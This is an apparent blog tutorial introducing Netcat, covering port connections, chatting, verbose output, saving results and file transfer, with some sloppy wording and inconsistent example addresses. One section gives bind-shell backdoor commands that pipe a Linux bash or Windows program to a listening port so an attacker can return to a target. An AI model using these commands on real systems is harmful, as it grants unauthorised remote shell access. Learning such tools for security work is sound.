Skip to main content

 

Introduction to Netcat

Netcat or NC is a utility tool that uses TCP and UDP connections to read and write in a network. It can be used for both attacking and security. In the case of attacking. It helps us to debug the network along with investing it. It runs on all operating systems.

Getting Started with Netcat
To start NC, the most basic option we can use the help command. This will show us all the options that we can use with Netcat. The help command is the following one: nc -h

Connecting to a Server
Here, we have connected FTP Server with the IP Address 192.168.1.6. To connect to the server at a specific port where a particular service running. In our case, the port is 21 i.e. FTP.

Syntax: nc [Target IP Address] [Target Port]
nc 192.168.17.43 21

Chatting
Netcat can also be used to chat between two users. We need to establish a connection before chatting. To do this we are going to need two devices. One will play the role of initiator and one will be a listener to start the conversation and so once the connection is established, communication can be done from both ends.First of all we will use windows 10 machine which will play role of Listener.Second we will use Kali linux machine which will play role of initiator. First, we will have to create a listener. We will use the following command to create a listener:
nc -lvvp 4444
where,
[-l]: Listen Mode
[vv]: Verbose Mode {It can be used once, but we use twice to be more verbose}
[p]: Local Port
ow, it’s time to create an initiator, for this we will just provide the IP Address of the System where we started the Listener followed by the port number.
NOTE: Use the same port to create an initiator that was used in creating listener.
nc 192.168.1.35 4444

 




Creating a backdoor
We can also create a backdoor using NC. To create a backdoor on the target system that we can come back to at any time. Command for attacking a Linux System.
nc -l -p 2222 -e /bin/bash
For Creating Backdoor for windows system.
nc -l -p 1337 -e hack.exe
This will open a listener on the system that will pipe the command shell or the Linux bash shell to the connecting system.
nc 192.168.1.35 2222

Verbose mode
In netcat, Verbose is a mode which can be initiated using [-v] parameter. Now verbose mode generates extended information. Basically, we will connect to a server using netcat two times to see the difference between normal and verbose mode.
The command is nc 192.168.17.43 21 -v

Save Output to Desktop
For the purpose of the record maintenance, better readability and future references, we will save the output of the Netcat. To do this we will use the parameter -o of the Netcat to save the output in the text file.

nc 192.168.17.43 21 -v -o /root/Desktop/Result.txt

File Transfer
Netcat can be used to transfer the file across devices. Here we will create a scenario where we will transfer a file from a windows system to Kali Linux system. To send the file from the Windows, we will use the following command.
nc -v -w 20 -p 8888 -l file.txt
So, this was a basic guide to netcat. It’s quite an interesting tool to use as well as it is pretty easy.

 

Comments

Post a Comment

Popular posts from this blog

What is Burp Suite?   Burp or Burp Suite is a set of tools used for penetration testing of web applications. It is developed by the company named Portswigger, which is also the alias of its founder Dafydd Stuttard. BurpSuite aims to be an all in one set of tools and its capabilities can be enhanced by installing add-ons that are called BApps. It is the most popular tool among professional web app security researchers and bug bounty hunters. Its ease of use makes it a more suitable choice over free alternatives like OWASP ZAP. Burp Suite is available as a community edition which is free, professional edition that costs  $399/year  and an enterprise edition that costs  $3999/Year . This article gives a brief introduction to the tools offered by BurpSuite. If you are a complete beginner in Web Application Pentest/Web App Hacking/Bug Bounty, we would recommend you to just read through without thinking too much about a term The tools offered by BurpSuite are: ...
Post a Comment
Read more